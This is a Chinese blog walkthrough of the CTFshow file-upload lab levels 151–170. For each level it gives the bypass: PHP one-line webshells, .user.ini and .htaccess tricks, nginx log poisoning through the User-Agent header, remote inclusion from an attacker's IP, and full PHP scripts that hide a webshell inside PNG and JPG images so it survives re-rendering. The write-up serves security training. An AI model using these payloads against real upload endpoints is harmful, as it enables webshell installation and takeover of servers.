CTFSHOW文件上传151-170

最新推荐文章于 2024-05-11 19:14:19 发布
最新推荐文章于 2024-05-11 19:14:19 发布
阅读量708 收藏 5
点赞数 1
分类专栏: CTF 文章标签: php web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68233961/article/details/129212413
版权

ctfshow 靶场系列

文件上传151关

打开靶场映入眼帘的就是前台校验不可靠
在这里插入图片描述
我们右键查看网页源代码,可以看到以下代码,可以看到是限制了只能上传.png后缀的图片文件
在这里插入图片描述
我们尝试上传一个gif的图片,可以看到不支持上传
在这里插入图片描述

既然是前端限制,那我们按F12将前端代码中的png修改为gif,可以看到上传成功
在这里插入图片描述
那我们直接将其允许的后缀修改为php,上传一句话木马,使用蚁剑连接,找到flag
在这里插入图片描述

文件上传152关

这一关是后端校验,当我们和上一关一样的做法后,他会提示文件不合规
在这里插入图片描述
我们在将前端验证改为php之后抓包,将content-type的类型改为image/png,就可以直接上传成功了
在这里插入图片描述
在这里插入图片描述

文件上传153关

我们将上一关的思路应用到这一关来,发现最后显示的还是上传文件不合规
在这里插入图片描述
我们尝试大小写之后发现是可以上传成功的,但是我们访问却直接下载下来了
在这里插入图片描述
因为这个网站的中间件是nginx,所以我们可以上传一个与.htaccess(apache才可以)文件有异曲同工之妙的.user.ini文件,在.user.ini文件写入auto_prepend_file=1.png
在这里插入图片描述
然后我们再上传1.png,在1.png里面写入一句话木马,然后访问upload/index.php,在url栏输入?x=system(’tac../flag.php');,即可读到flag
在这里插入图片描述

文件上传154关

我们用上一关的思路之后发现,.user.ini文件是可以上传的,但是1.png写入一句话木马之后是上传不了的
在这里插入图片描述
经过测试之后发现,他是会检测内容的,文件内容不能有<?php,以下写法是可以规避这个拦截的

<? echo '123';?>    //前提是开启配置参数short_open_tags=on
<?=(表达式)?>        //不需要开启参数设置
<% echo '123';%>    //前提是开启配置参数asp_tags=on
<script language=”php”>echo '1'; </script>//不需要修改参数开关

上传完毕之后,访问和上一关一样的路径即可看到flag
在这里插入图片描述

文件上传155关

按照上一关的思路来

文件上传156关

按照上一关的思路来,发现上传的时候过滤了[],我们将它替换为{}
在这里插入图片描述

文件上传157关

按照上一关的思路来,发现过滤了{},我们将1.png内容替换为

<?=system('tac ../flag.*')?>

然后访问/upload即可

文件上传158关

和上一关做法一样

文件上传159关

按照上一关的思路来,发现它过滤了(),那么我们将1.png的内容改为,这里使用反引号,作用和system是相同的

<?=`tac ../fl*`?>

文件上传160关

根据上一关的思路来,发现反引号也被过滤了,Nginx一般会记录日志,日志会记录访问者的UA头,所以我们可以把后门代码写到UA头里面,然后利用.user.ini来包含日志文件,Nginx默认日志位置/var/log/nginx

<?=include"/var/lo"."g/nginx/access.lo"."g"?>//1.png内容

将.user.ini和1.png上传完成之后,访问/upload/,然后抓包,将UA头改为一句话木马,然后重新访问/upload?x=system('tac ../flag.php');,即可看到flag

文件上传161关

按照上一关的思路来,发现.user.ini文件也上传不了了,这是因为这一关他会检验文件头,我们需要在前面加一个GIF89a这样一个文件头,不同后缀图片文件的文件头是不一样的

GIF89a auto_prepend_file=1.png //.user.ini文件内容
GIF89A <?=include"/var/lo"."g/nginx/access.lo"."g"?>//1.png文件内容

在这里插入图片描述
上传完成之后,再重新抓包将UA头改为<?php system('tac ../flag.php');?>,重新访问/upload即可

文件上传162关

根据上一关的思路来,发现这一关不仅是检测了文件头,也过滤了()[]{}.这些,所以我们可以将.user.ini的内容写为

GIF89a
auto_prepend_file=png

我们可以远程包含文件,然后这个文件里面有一句话木马,这边需要用到IP转换地址,将IP转换为纯数字,网址:https://www.bejson.com/convert/ip2int/ ,png内容为

GIF89a
<?=include'http://IP转换/'>

文件上传163关

根据上一关的思路来,我们访问上传的png的时候发现他被删除了,这个时候有两个办法,一个是利用条件竞争,一个是改变.user.ini的内容,这里推荐第二种
直接将.user.ini的内容变更为

GIF89a
auto_prepend_file=http://IP

访问upload执行命令即可

文件上传164关

这一关会把上传上去的图片进行二次渲染,会修改原本图片的一些东西,所以我们可以利用工具或者手工将后门代码插入到图片里面
在这里插入图片描述
当然,一般这样是上传不上去的,所以这个时候可以利用工具来将木马插入到图片中,工具代码如下,将代码放置到PHP环境中执行即可

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'2.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */
?>

上传成功之后访问图片地址,在后面加入&0=system,1=tac flag.php,这个1=需要用POST方式提交

文件上传165关

这一关也是二次渲染,和上一关差不多,不过图片后缀变为了jpg,以下是jpg渲染代码,用法是将以下代码和需要渲染的图片放到PHP目录下,cmd调用即可

<?php
    $miniPayload = "<?=eval(\$_POST[1]);?>";

    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }
    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }
    set_error_handler("custom_error_handler");
    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }
        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

在这里插入图片描述

文件上传166关

这一关变为了zip,直接上传一个test.zip,内容写为木马就行了

文件上传167关

这一关主要考核. htaccess文件的作用,我们直接上传一个1.jpg,这里面需要有一句话木马,然后上传一个htaccess文件,

AddType application/x-httpd-php .jpg //htaccess文件内容

上传完毕之后访问/upload/1.jpg即可

文件上传168关

这一关是考验免杀的,可以直接上传PHP文件,

<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?>

文件上传169关

这一关上传了.user.ini之后,访问upload目录显示403,所以我们需要上传一个index.php
构造.user.ini利用条件:上传index.php 内容随意
上传.user.ini包含日志:auto_prepend_file=/var/log/nginx/access.log
访问地址带后门UA头写入日志:<?=eval($_POST[x]);?>
当然也可以和上一关一样,搞免杀

文件上传170关

和上一关一样

Acyykl
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow 文件上传 web168
Kradress的博客
02-17 363
目录思路总结 思路 先查看源代码,发现限制上传png 直接上传png的图片马,回显null,发现对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用 替换图片马中的一句话,把文件后缀改成php,成功上传 <?php $_REQUEST[0]($_REQUEST[1]);?> 访问/upload/shell.php,直接rce拿到flag 总结 … ...
ctfshow---文件上传
fainpo的博客
04-10 569
来到文件上传了。
2024年网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1),网络安全事件分发机制及设计思路
最新发布
2401_84264727的博客
05-11 981
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。要修改的图片的路径,1.png是使用的文件,可以不存在。
【ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1628
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端有
ctfshow——文件上传
qq_55202378的博客
12-27 1253
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
ctfshow-VIP题目-Web-详细解题思路
01-27
发现/editor目录,访问出现一个编辑器上传附件的地方,发现文件空间可以查看路径,发现一个nothinghere文件夹,比较可疑,里面找到fl000g.txt文件,访问/nothinghere/fl000g.txt,发现flag,flag:ctfshow{...}。...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFShow-周末大挑战parse-url篇Writeup
05-19
cat flag_is_here.txt')`被解析并执行,它试图改变目录到根目录,并读取`flag_is_here.txt`文件。这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。...
ctfshow web162-170_ctfshow162题,网络安全开发者值得深入思考的几个问题
m0_60635637的博客
04-05 594
这种情况,我们可以用条件竞争。png删除规则:1.后门删除。2.什么都删除。条件竞争:上传成功,立马访问,创建新代码在这里只删除了png,所以我们可以把代码放到.user.ini里。发现可以,直接用蚁剑连即可。
ctfshow-web154(文件上传)
m0_62094846的博客
01-18 784
png上传也会错误,说文件内容不合规 上传个不带木马的文件就可以 说明一句话木马中有敏感信息 使用其他短标签可以绕过 <?= eval($_POST[1]);?> <? eval($_POST[1]);?> <% eval($_POST[1]);%> 传入png的木马文件可以,但是php文件加了png文件头也没用 说明可能php确实就是不能使用 考虑使用配置文件 .user.ini 确认是否可以使用 确实可以,接下来就比较好办了 ...
ctfshow web162-170_ctfshow162题(1),2024年最新2024网络安全春招面试经历
2401_84164503的博客
04-09 809
这就给了我们一种思路:我们把原来的图片和二次渲染后的图片进行对比,找到不改变的地方,把我们的后门代码植入到这个地方中,再进行上传。参考贴脚本:php$y += 3) {?这脚本生成的后门是用get方式传递system post传递命令运行脚本,生成了一个png,上传成功。注意:这里图片的地址是用php代码包含的。所以才可以执行php代码。如果不是这样,而是直接用路径显示,我们就需要使用.user.ini文件。
CTFSHOW 文件上传(学习记录)
ximo的博客
02-16 577
目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证,抓包修改数据OK Web 152 直接上传一句话木马,连接即可 Web 153 参考链接: 文件上传漏洞——.htaccess和.user.ini配置文件的应用 因为该环境是nginx搭建的,所以.h
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1052
CTFshow-文件上传
CTFSHOW web160 文件上传
Mirror_iu的博客
07-26 1145
CTFSHOW web160详解
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5488
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
ctfshow文件上传
09-02
对于CTF Show文件上传的问题,我可以给您一些基本的指导。 在CTF(Capture The Flag)比赛中,文件上传通常是一个常见的题目类型。这类题目要求参赛选手利用漏洞或者绕过限制,成功将文件上传到目标服务器上。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值